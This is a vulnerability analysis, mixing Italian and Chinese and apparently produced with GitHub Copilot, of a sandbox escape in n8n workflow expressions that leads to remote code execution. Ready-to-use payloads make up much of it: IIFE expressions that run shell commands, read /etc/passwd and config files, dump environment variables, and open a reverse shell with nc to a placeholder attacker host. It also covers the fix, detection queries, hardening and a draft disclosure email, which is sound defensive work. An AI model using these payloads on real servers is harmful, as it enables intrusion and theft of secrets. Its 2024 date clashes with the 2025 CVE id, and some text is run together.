
Analisi della vulnerabilità CVE-2025-68613 assistita da GitHub Copilot
Data: 23 dicembre 2024 Stato: ✅ RCE completamente verificata con successo Punteggio CVSS: 10.0 (Critico)
{
{
(function () {
var require = this.process.mainModule.require;
var {execSync} = require('child_process');
return execSync('id', {encoding: 'utf8'}).trim();
})()
}
}
Risultato dell'esecuzione: restituisce correttamente le informazioni sull'utente di sistema (ad es. uid=1000(n8n) gid=1000(n8n) groups=1000(n8n))
用户输入
↓
{{ (function() { ... })() }}
↓
Expression.resolveSimpleParameterValue()
↓
创建 data 上下文对象
↓
data.process = 真实的 process 对象引用
↓
Tournament.execute(expression, data)
↓
FunctionEvaluator.evaluate()
↓
fn.call(data, errorHandler) ← ⚠️ 关键: this = data
↓
立即执行函数执行
↓
this.process.mainModule.require ← ⚠️ 访问真实 require
↓
加载 child_process 模块
↓
execSync('id') ← 🔥 完整 RCE!
File: packages/workflow/src/expression.ts
Funzione: Expression.resolveSimpleParameterValue()
Righe: circa 230-290
// 生成数据代理
const dataProxy = new WorkflowDataProxy(
this.workflow,
runExecutionData,
runIndex,
itemIndex,
activeNodeName,
connectionInputData,
siblingParameters,
mode,
additionalKeys,
executeData,
-1,
selfData,
contextNodeName,
);
const data = dataProxy.getDataProxy();
// ⚠️ 漏洞点 1: 添加 process 对象到 data
data.process =
typeof process !== 'undefined'
? {
arch: process.arch,
env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE === 'true' ? {} : process.env,
platform: process.platform,
pid: process.pid,
ppid: process.ppid,
release: process.release,
version: process.pid,
versions: process.versions,
}
: {};
// ⚠️ 问题: 虽然这里只暴露了部分属性,但传递的是对象引用
// 实际的 process 对象仍然可以通过原型链或其他方式访问
File: node_modules/@n8n/tournament/src/FunctionEvaluator.ts
evaluate(expr
:
string, data
:
unknown
):
ReturnValue
{
const fn = this.getFunction(expr);
// ⚠️ 漏洞点 2: 将 data 作为 this 传递
return fn.call(data, this.instance.errorHandler);
}
private
getFunction(expr
:
string
):
Function
{
if (expr in this._codeCache) {
return this._codeCache[expr];
}
const [code] = this.instance.getExpressionCode(expr);
// ⚠️ 漏洞点 3: 使用 new Function 创建函数
const func = new Function('E', code + ';');
this._codeCache[expr] = func;
return func;
}
File: packages/workflow/src/expression-sandboxing.ts
Prima della v1.122.0:
// ❌ 没有 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
before: [], // ← 空数组,没有 this sanitization
after: [PrototypeSanitizer, DollarSignValidator],
});
Dalla v1.122.0 in poi:
// ✅ 添加了 FunctionThisSanitizer
const tournamentEvaluator = new Tournament(errorHandler, undefined, undefined, {
before: [FunctionThisSanitizer], // ← 新增的 hook
after: [PrototypeSanitizer, DollarSignValidator],
});
// FunctionThisSanitizer 实现
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
astVisit(ast, {
visitFunction(path) {
// 重写所有函数表达式,显式绑定 this 到安全对象
const safeThis = b.objectExpression([
b.property('init', b.identifier('process'), b.objectExpression([]))
]);
// 将 function() { ... } 改写为 function() { ... }.bind({ process: {} })
}
});
};
File: packages/workflow/src/utils.ts
Funzione: isSafeObjectProperty()
Prima della v1.122.0:
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf'
]);
// ❌ 缺少 mainModule, binding, _load
Dalla v1.122.0 in poi:
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf',
'mainModule', // ✅ 新增
'binding', // ✅ 新增
'_load' // ✅ 新增
]);
{
{
(function () {
var require = this.process.mainModule.require;
var {execSync} = require('child_process');
return execSync('id', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('whoami', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('pwd', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('uname -a', {encoding: 'utf8'}).trim();
})()
}
}
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('ls -la /', {encoding: 'utf8'});
})()
}
}
// 读取敏感文件
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readFileSync('/etc/passwd', 'utf8');
})()
}
}
// 列出目录
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readdirSync('/').join('\n');
})()
}
}
// 读取 n8n 配置
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readFileSync('./.n8n/config', 'utf8');
})()
}
}
// 列出当前目录
{
{
(function () {
var fs = this.process.mainModule.require('fs');
return fs.readdirSync('.').join('\n');
})()
}
}
// 通过 this.process 直接访问
{
{
(function () {
return JSON.stringify(this.process.env);
})()
}
}
// 或使用已知可用的方式
{
{
JSON.stringify(process.env)
}
}
// 检查网络工具
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('which nc', {encoding: 'utf8'}).trim();
})()
}
}
// 获取网络接口
{
{
(function () {
var os = this.process.mainModule.require('os');
return JSON.stringify(os.networkInterfaces());
})()
}
}
// 反弹 Shell (⚠️ 危险!仅用于授权测试)
{
{
(function () {
return this.process.mainModule.require('child_process')
.execSync('nc -e /bin/sh attacker-ip 4444', {encoding: 'utf8'});
})()
}
}
| # | Tipo di attacco | Motivo |
|---|---|---|
| 1 | require diretto | Non disponibile nel nuovo scope |
| 2 | process nel costruttore Function | this viene sanitizzato in alcuni contesti |
| 3 | process.binding / process._load |
{
{
Object.keys(process.env)
}
} // ✅ 成功
N8N_BLOCK_ENV_ACCESS_IN_NODE non è impostata su true{
{
[][`constructor`][`constructor`]
}
} // ✅ 成功
{
{
(function () {
return this.process.mainModule.require;
})()
}
} // ✅ 成功
this nelle funzioni a esecuzione immediata punta ancora al contesto dati originalethis.process.mainModule.require è accessibileLa combinazione delle tre = RCE completa!
// 新增的 AST before hook
export const FunctionThisSanitizer: ASTBeforeHook = (ast, dataNode) => {
// 遍历所有函数表达式
// 重写函数,强制绑定 this 到 { process: {} }
// 这样即使是 IIFE,this 也是安全的空对象
};
const unsafeObjectProperties = new Set([
'__proto__',
'prototype',
'constructor',
'getPrototypeOf',
'mainModule', // ← 新增
'binding', // ← 新增
'_load' // ← 新增
]);
// 可能将默认值改为 true
data.process = {
env: process.env.N8N_BLOCK_ENV_ACCESS_IN_NODE !== 'false' ? {} : process.env,
// ...
};
Stringa del vettore: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Punteggio base: 10.0 (massimo)
N8N_BLOCK_ENV_ACCESS_IN_NODE=true non è impostata# 方法 1: 导出环境变量
export N8N_BLOCK_ENV_ACCESS_IN_NODE=true
# 方法 2: 在 .env 文件中
echo "N8N_BLOCK_ENV_ACCESS_IN_NODE=true" >> .env
# 方法 3: Docker Compose
environment:
- N8N_BLOCK_ENV_ACCESS_IN_NODE=true
# npm
npm install -g n8n@latest
# Docker
docker pull docker.n8n.io/n8nio/n8n:latest
docker-compose down
docker-compose up -d
# 验证版本
n8n --version # 应该 >= 1.122.0
-- 如果使用 PostgreSQL
SELECT name, nodes
FROM workflows
WHERE nodes::text LIKE '%process%'
OR nodes::text LIKE '%constructor%'
OR nodes::text LIKE '%mainModule%'
OR nodes::text LIKE '%require%';
# docker-compose.yml
services:
n8n:
image: docker.n8n.io/n8nio/n8n:latest
read_only: true
security_opt:
- no-new-privileges:true
- seccomp=seccomp-profile.json
cap_drop:
- ALL
cap_add:
- CHOWN
- SETGID
- SETUID
environment:
- N8N_BLOCK_ENV_ACCESS_IN_NODE=true
收件人: [email protected]
主题: [CRITICAL] RCE 0-day Vulnerability - IIFE this Context Bypass
严重性: CVSS 10.0 (Critical)
影响版本: n8n < 1.122.0
概述:
发现了一个严重的 RCE 漏洞,允许认证用户通过立即执行函数(IIFE)
访问 process.mainModule.require,从而执行任意系统命令。
验证的 PoC:
{{ (function() {
var require = this.process.mainModule.require;
var { execSync } = require('child_process');
return execSync('id', { encoding: 'utf8' }).trim();
})() }}
根本原因:
1. IIFE 中的 this 未被 sanitize
2. process.mainModule 未被封禁
3. N8N_BLOCK_ENV_ACCESS_IN_NODE 默认为 false
建议修复:
1. 实施 FunctionThisSanitizer hook
2. 添加 mainModule, binding, _load 到黑名单
3. 默认启用环境变量保护
详细分析请见附件。
Data di creazione: 23 dicembre 2024 Stato della vulnerabilità: ✅ completamente verificata con successo Punteggio CVSS: 10.0 (Critico) Raccomandazione: divulgare e correggere immediatamente
🎉 Congratulazioni, hai scoperto una vulnerabilità RCE da punteggio pieno! Gestiscila e divulgala in modo responsabile! 🔒
| # | Tipo di attacco | Payload | Stato | CVSS |
|---|
| 1 | Divulgazione variabili d'ambiente | {{ Object.keys(process.env) }} | ✅ Successo | 8.5 |
| 2 | Bypass del costruttore | {{ [][constructor] }} | ✅ Successo | 8.0 |
| 3 | Costruttore Function | {{ [][constructor][constructor] }} | ✅ Successo | 8.5 |
| 4 | Esecuzione di codice | {{ [][constructor][constructor]('return 1+1')() }} | ✅ Successo | 9.0 |
| 5 | RCE completa | {{ (function() { this.process.mainModule.require... })() }} | ✅ Successo | 10.0 |
| Probabilmente bloccati o limitati |
| Metrica | Valore | Descrizione |
|---|
| Vettore d'attacco (AV) | Rete (N) | Sfruttabile da remoto |
| Complessità d'attacco (AC) | Bassa (L) | Sfruttamento semplice |
| Privilegi richiesti (PR) | Bassi (L) | Richiede solo utente autenticato |
| Interazione utente (UI) | Nessuna (N) | Nessuna interazione utente richiesta |
| Scope (S) | Modificato (C) | Impatta il sistema sottostante |
| Riservatezza (C) | Alta (H) | Divulgazione totale delle informazioni |
| Integrità (I) | Alta (H) | Controllo totale del sistema |
| Disponibilità (A) | Alta (H) | Interruzione totale del servizio |